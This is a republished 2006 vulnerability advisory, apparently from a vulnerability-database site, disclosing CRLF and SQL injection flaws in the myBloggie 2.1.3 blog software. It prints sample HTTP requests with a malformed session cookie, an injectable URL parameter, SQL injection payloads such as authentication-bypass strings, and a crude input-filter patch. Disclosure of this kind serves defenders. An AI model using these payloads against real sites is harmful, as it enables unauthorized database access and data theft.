Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HYSA-2006-008.txt

🗓️ 22 May 2006 00:00:00Reported by matrix killerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

myBloggie 2.1.3 CRLF & SQL Injection, Medium severity, vendor unresponsiv

Code
`------------------------------------------------------  
HYSA-2006-008 h4cky0u.org Advisory 017  
------------------------------------------------------  
Date - Wed May 17 2006  
  
  
TITLE:  
======  
  
myBloggie 2.1.3 CRLF & SQL Injection   
  
  
SEVERITY:   
=========   
  
Medium   
  
  
SOFTWARE:   
=========   
  
myBloggie 2.1.3   
  
http://mybloggie.mywebland.com/   
  
  
INFO:   
=====   
  
myBloggie is considered one of the most simple, user-friendliest yet packed with features   
  
Weblog system available to date.   
  
  
DESCRIPTION:   
============   
  
--==CRLF injection==--   
  
GET /mybloggie/ HTTP/1.0   
Accept: */*   
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)   
Host: 127.0.0.1:80   
Cookie: PHPSESSID=op0-11{}};q, or something like that   
Connection: Close   
  
GET /mybloggie/admin.php HTTP/1.0   
Accept: */*   
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)   
Host: 127.0.0.1:80   
Cookie: PHPSESSID=op0-11{}};q, or something like that   
Connection: Close   
  
GET /mybloggie/index.php HTTP/1.0   
Accept: */*   
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)   
Host: 127.0.0.1:80   
Cookie: PHPSESSID=op0-11{}};q, or something like that   
Connection: Close   
  
--==SQL injection==--   
  
http://127.0.0.1/mybloggie/index.php?mode=viewid&post_id='   
  
Also MurderSkillz discovered a bug in the search function. Here is a proof-of-concept:   
  
1' having '1'='1'--   
  
or   
  
' or 'x'='x--   
  
And a little patch from me:   
  
if(ereg('[^A-Za-z0-9_]',$_POST['keyword'])){   
echo "Invalid Characters";   
exit;   
}   
  
if (isset($_GET['select'])) $select=$_GET['select'];   
if (isset($_POST['keyword'])) $keyword=$_POST['keyword'];   
  
  
$keyword = preg_replace($html_entities_match, $html_entities_replace,$keyword);   
//....   
  
  
VENDOR STATUS:   
==============   
  
Vendor was contacted but no response received till date.   
  
  
CREDITS:   
========   
  
This vulnerability was discovered and researched by   
matrix_killer of h4cky0u Security Forums.   
  
mail : matrix_k at abv.bg   
  
web : http://www.h4cky0u.org   
  
  
Search function sql injection was discovered by: MurderSkillz  
  
  
Co-Researcher:  
  
h4cky0u of h4cky0u Security Forums.   
  
mail : h4cky0u at gmail.com   
  
web : http://www.h4cky0u.org   
  
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!  
  
  
ORIGINAL ADVISORY:  
==================  
  
http://www.h4cky0u.org/advisories/HYSA-2006-008-mybloggie.txt  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 May 2006 00:00Current
7.4High risk
Vulners AI Score7.4
mybloggie 2.1.3crlf injectionsql injectionmedium severityvendor unresponsiveh4cky0u.org
25